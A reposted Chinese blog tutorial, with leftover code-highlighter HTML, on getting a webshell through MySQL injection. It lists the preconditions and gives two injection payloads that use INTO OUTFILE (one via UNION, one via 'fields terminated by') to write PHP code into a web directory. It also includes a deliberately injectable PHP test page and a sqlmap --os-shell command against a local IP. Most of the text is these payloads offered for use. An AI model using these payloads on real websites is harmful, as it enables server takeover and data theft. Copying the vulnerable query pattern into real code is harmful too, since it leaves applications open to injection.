可搜索,可注册,可登录,致敬逗比大佬!尽在救援版逗比根据地 dbgjd.com
投稿文章 | 广告合作 | Telegram 群组 / 公告频道 / 使用教程

MySQL注入两种写入一句话快速拿Webshell的方法

News lee_avison1960 91℃ 0评论

利用需要满足以下条件:

  1. root权限
  2. GPC关闭(能使用单引号)
  3. 有绝对路径(读文件可以不用,写文件必须)
  4. 没有配置–secure-file-priv

1.union

</div> <div class="crayon-main" style="margin:0px;padding:0px;list-style:none;">     <table class="crayon-table" style="border-spacing:0px;border:1px solid #DDDDDD;text-align:center;">         <tbody>             <tr class="crayon-row">                 <td class="crayon-nums " data-settings="show" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">                     <div class="crayon-nums-content" style="margin:0px;padding:0px;list-style:none;">                         <div class="crayon-num" data-line="crayon-59a43f023b0b0450187454-1" style="margin:0px;padding:0px;list-style:none;">                             1                         </div>                     </div>                 </td>                 <td class="crayon-code" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">                     <div class="crayon-pre" style="margin:0px;padding:0px;list-style:none;">                         <div id="crayon-59a43f023b0b0450187454-1" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">                             <span class="crayon-i">id</span><span class="crayon-o">=</span><span class="crayon-cn">2</span><span class="crayon-sy">)</span> <span class="crayon-e">union </span><span class="crayon-i">select</span> <span class="crayon-cn">1</span><span class="crayon-sy">,</span><span class="crayon-cn">2</span><span class="crayon-sy">,</span><span class="crayon-cn">3</span><span class="crayon-sy">,</span><span class="crayon-cn">4</span><span class="crayon-sy">,</span><span class="crayon-cn">5</span><span class="crayon-sy">,</span><span class="crayon-cn">6</span><span class="crayon-sy">,</span><span class="crayon-cn">7</span><span class="crayon-sy">,</span>'<span class="crayon-ta"><?</span> <span class="crayon-e">phpinfo</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span> <span class="crayon-ta">?></span>’ <span class="crayon-e">into </span><span class="crayon-i">outfile</span> ‘<span class="crayon-o">/</span><span class="crayon-i">home</span><span class="crayon-o">/</span><span class="crayon-i">wwwroot</span><span class="crayon-o">/</span><span class="crayon-i">lu4n</span><span class="crayon-sy">.</span><span class="crayon-i">com</span><span class="crayon-o">/</span><span class="crayon-i">luan_phpinfo</span><span class="crayon-sy">.</span><span class="crayon-i">php</span>’<span class="crayon-o">%</span><span class="crayon-cn">23</span>                         </div>                     </div>                 </td>             </tr>         </tbody>     </table> </div> 

<? phpinfo(); ?>为写入的内容可添加自己的一句话  /home/wwwroot/5ime.cn/luan_phpinfo.php 为已存在的网站目录下的文件即插入文件名

2.no union

</div> <div class="crayon-main" style="margin:0px;padding:0px;list-style:none;">     <table class="crayon-table" style="border-spacing:0px;border:1px solid #DDDDDD;text-align:center;">         <tbody>             <tr class="crayon-row">                 <td class="crayon-nums " data-settings="show" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">                     <div class="crayon-nums-content" style="margin:0px;padding:0px;list-style:none;">                         <div class="crayon-num" data-line="crayon-59a43f023b0b8247295740-1" style="margin:0px;padding:0px;list-style:none;">                             1                         </div>                     </div>                 </td>                 <td class="crayon-code" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">                     <div class="crayon-pre" style="margin:0px;padding:0px;list-style:none;">                         <div id="crayon-59a43f023b0b8247295740-1" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">                             <span class="crayon-i">id</span><span class="crayon-o">=</span><span class="crayon-cn">2</span><span class="crayon-sy">)</span> <span class="crayon-e">into </span><span class="crayon-i">outfile</span> ‘<span class="crayon-o">/</span><span class="crayon-i">home</span><span class="crayon-o">/</span><span class="crayon-i">wwwroot</span><span class="crayon-o">/</span><span class="crayon-i">lu4n</span><span class="crayon-sy">.</span><span class="crayon-i">com</span><span class="crayon-o">/</span><span class="crayon-i">luan_phpinfo</span><span class="crayon-sy">.</span><span class="crayon-i">php</span>’ <span class="crayon-e">fields</span> <span class="crayon-e">terminated</span> <span class="crayon-e">by</span> ‘<span class="crayon-ta"><?</span> <span class="crayon-e">phpinfo</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span> <span class="crayon-ta">?></span>’<span class="crayon-o">%</span><span class="crayon-cn">23</span>                         </div>                     </div>                 </td>             </tr>         </tbody>     </table> </div> 

第二种方法最早最早是在吐司的一个 2015-1-24 的帖子里看到的,吐司果然大牛多。
效果如下:
MySQL注入两种写入一句话快速拿Webshell的方法


这里用的第二种方法是通过插入分隔符号来getshell的,所以必须查询结果有多个列
一般情况下的注入点都是符合条件的。

sqlmap利用方法

以luan_test.php为例:

</div> <div class="crayon-main" style="margin:0px;padding:0px;list-style:none;">     <table class="crayon-table" style="border-spacing:0px;border:1px solid #DDDDDD;text-align:center;">         <tbody>             <tr class="crayon-row">                 <td class="crayon-nums " data-settings="show" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">                     <div class="crayon-nums-content" style="margin:0px;padding:0px;list-style:none;">                         <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-1" style="margin:0px;padding:0px;list-style:none;">                             1                         </div>                         <div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-2" style="margin:0px;padding:0px;list-style:none;">                             2                         </div>                         <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-3" style="margin:0px;padding:0px;list-style:none;">                             3                         </div>                         <div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-4" style="margin:0px;padding:0px;list-style:none;">                             4                         </div>                         <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-5" style="margin:0px;padding:0px;list-style:none;">                             5                         </div>                         <div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-6" style="margin:0px;padding:0px;list-style:none;">                             6                         </div>                         <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-7" style="margin:0px;padding:0px;list-style:none;">                             7                         </div>                         <div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-8" style="margin:0px;padding:0px;list-style:none;">                             8                         </div>                         <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-9" style="margin:0px;padding:0px;list-style:none;">                             9                         </div>                         <div class="crayon-num crayon-striped-num" data-line="crayon-59a43f023b0bc142086430-10" style="margin:0px;padding:0px;list-style:none;">                             10                         </div>                         <div class="crayon-num" data-line="crayon-59a43f023b0bc142086430-11" style="margin:0px;padding:0px;list-style:none;">                             11                         </div>                     </div>                 </td>                 <td class="crayon-code" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">                     <div class="crayon-pre" style="margin:0px;padding:0px;list-style:none;">                         <div id="crayon-59a43f023b0bc142086430-1" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">                             <span class="crayon-ta"><?php</span>                         </div>                         <div id="crayon-59a43f023b0bc142086430-2" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;">                             <span class="crayon-sy">@</span><span class="crayon-v">$link</span><span class="crayon-o">=</span> <span class="crayon-e">mysql_connect</span><span class="crayon-sy">(</span><span class="crayon-s">"localhost"</span><span class="crayon-sy">,</span><span class="crayon-s">"root"</span><span class="crayon-sy">,</span><span class="crayon-s">""</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span>                         </div>                         <div id="crayon-59a43f023b0bc142086430-3" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">                             <span class="crayon-e">mysql_select_db</span><span class="crayon-sy">(</span><span class="crayon-s">"mysql"</span><span class="crayon-sy">,</span><span class="crayon-v">$link</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span>                         </div>                         <div id="crayon-59a43f023b0bc142086430-4" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;">                             <span class="crayon-v">$user</span> <span class="crayon-o">=</span> <span class="crayon-e">strtolower</span><span class="crayon-sy">(</span><span class="crayon-v">$_GET</span><span class="crayon-sy">[</span><span class="crayon-s">'user'</span><span class="crayon-sy">]</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span>                         </div>                         <div id="crayon-59a43f023b0bc142086430-5" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">                             <span class="crayon-st">if</span><span class="crayon-sy">(</span><span class="crayon-e">strpos</span><span class="crayon-sy">(</span><span class="crayon-v">$user</span><span class="crayon-sy">,</span><span class="crayon-s">"union"</span><span class="crayon-sy">)</span> <span class="crayon-o">===</span> <span class="crayon-t">false</span><span class="crayon-sy">)</span><span class="crayon-sy">{</span>                         </div>                         <div id="crayon-59a43f023b0bc142086430-6" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;">                             <span class="crayon-v">$sql</span><span class="crayon-o">=</span> <span class="crayon-s">"SELECT * FROM user where user='{$user}'"</span><span class="crayon-sy">;</span>                         </div>                         <div id="crayon-59a43f023b0bc142086430-7" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">                             <span class="crayon-k ">echo</span> <span class="crayon-v">$sql</span> <span class="crayon-sy">.</span> <span class="crayon-s">'<br>'</span><span class="crayon-sy">;</span>                         </div>                         <div id="crayon-59a43f023b0bc142086430-8" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;">                             <span class="crayon-e">mysql_query</span><span class="crayon-sy">(</span><span class="crayon-v">$sql</span><span class="crayon-sy">)</span><span class="crayon-sy">;</span>                         </div>                         <div id="crayon-59a43f023b0bc142086430-9" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">                             <span class="crayon-k ">echo</span> <span class="crayon-e">mysql_errno</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span> <span class="crayon-sy">.</span> <span class="crayon-s">": "</span> <span class="crayon-sy">.</span> <span class="crayon-e">mysql_error</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">.</span> <span class="crayon-s">" "</span><span class="crayon-sy">;</span>                         </div>                         <div id="crayon-59a43f023b0bc142086430-10" class="crayon-line crayon-striped-line" style="margin:0px;padding:0px;list-style:none;">                             <span class="crayon-sy">}</span>                         </div>                         <div id="crayon-59a43f023b0bc142086430-11" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">                             <span class="crayon-ta">?></span>                         </div>                     </div>                 </td>             </tr>         </tbody>     </table> </div> 

经测试,sqlmap最新版实际是支持这个方法的:

</div> <div class="crayon-main" style="margin:0px;padding:0px;list-style:none;">     <table class="crayon-table" style="border-spacing:0px;border:1px solid #DDDDDD;text-align:center;">         <tbody>             <tr class="crayon-row">                 <td class="crayon-nums " data-settings="show" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">                     <div class="crayon-nums-content" style="margin:0px;padding:0px;list-style:none;">                         <div class="crayon-num" data-line="crayon-59a43f023b0be210058938-1" style="margin:0px;padding:0px;list-style:none;">                             1                         </div>                     </div>                 </td>                 <td class="crayon-code" style="margin:0px;padding:2px;list-style:none;border:1px solid #DDDDDD;">                     <div class="crayon-pre" style="margin:0px;padding:0px;list-style:none;">                         <div id="crayon-59a43f023b0be210058938-1" class="crayon-line" style="margin:0px;padding:0px;list-style:none;">                             <span class="crayon-v">C</span><span class="crayon-o">:</span><span class="crayon-sy">/</span><span class="crayon-v">luan</span><span class="crayon-sy">/</span><span class="crayon-v">sqlmap</span><span class="crayon-o">></span><span class="crayon-e">python </span><span class="crayon-v">sqlmap</span><span class="crayon-e">.py</span> <span class="crayon-o">-</span><span class="crayon-i">u</span> “<span class="crayon-v">http</span><span class="crayon-o">:</span><span class="crayon-o">/</span><span class="crayon-o">/</span><span class="crayon-cn">192.168.2.200</span><span class="crayon-o">/</span><span class="crayon-v">luan_test</span><span class="crayon-e">.php</span><span class="crayon-sy">?</span><span class="crayon-v">user</span><span class="crayon-o">=</span><span class="crayon-i">root</span>” –<span class="crayon-v">os</span><span class="crayon-o">-</span><span class="crayon-v">shell</span>                         </div>                     </div>                 </td>             </tr>         </tbody>     </table> </div> 

MySQL注入两种写入一句话快速拿Webshell的方法
MySQL注入两种写入一句话快速拿Webshell的方法

但是,如果–os-shell用不了,sqlmap有个写文件的选项,经测试不成功。。。。
MySQL注入两种写入一句话快速拿Webshell的方法

也就是说,sqlmap只能传自己的webshell
MySQL注入两种写入一句话快速拿Webshell的方法

如果工具党遇到这种情况,直接使用sqlmap –os-shell然后用sqlmap上传的Webshell来操作就可以了。

转载请注明:逗比根据地 » MySQL注入两种写入一句话快速拿Webshell的方法

喜欢 (0)
发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址